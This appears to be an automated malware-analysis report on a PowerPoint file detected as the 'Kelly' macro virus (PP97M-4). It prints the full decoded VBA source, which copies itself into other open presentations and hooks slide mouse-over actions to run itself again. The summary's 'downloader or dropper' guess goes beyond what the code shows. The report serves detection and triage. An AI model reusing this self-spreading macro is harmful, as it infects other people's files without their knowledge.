MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
This PowerPoint file contains VBA macros detected by ClamAV as Win.Trojan.PP97M-4. The macro code, named 'Kelly', is designed to copy itself to other open presentations and execute. This behavior suggests downloader or dropper functionality, aiming to spread and potentially execute further malicious code, though no specific payload or network indicators were extracted.
Heuristics (2)
- ClamAV: Win.Trojan.PP97M-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.PP97M-4
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 656 bytes |

SHA-256: 059c1ec401199eb56ca5062920646695c5ce2e6d58b37b1b51ebebbf67744ad2
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Kelly"
'Copyright (C) 1998 by FlyShadow ~^^~ - Kelly
Sub ι(Kelly)
On Error Resume Next
Set α = ActivePresentation.VBProject.VBComponents("Kelly").CodeModule
ν = α.CountOfLines + 1: λ = α.Lines(1, ν)
For Each ν In Presentations
If ν.VBProject.VBComponents(α).Name <> α Then
ν.VBProject.VBComponents.Add(1).Name = α
ν.VBProject.VBComponents(α).CodeModule.InsertLines 1, λ
For Each η In ν.Slides(ν.Slides.Count).Shapes
If η.ActionSettings(ppMouseOver).Action = 0 Then _
η.ActionSettings(ppMouseOver).Action = ppActionRunMacro: _
η.ActionSettings(ppMouseOver).Run = "ι"
Next: End If: Next
End Sub
```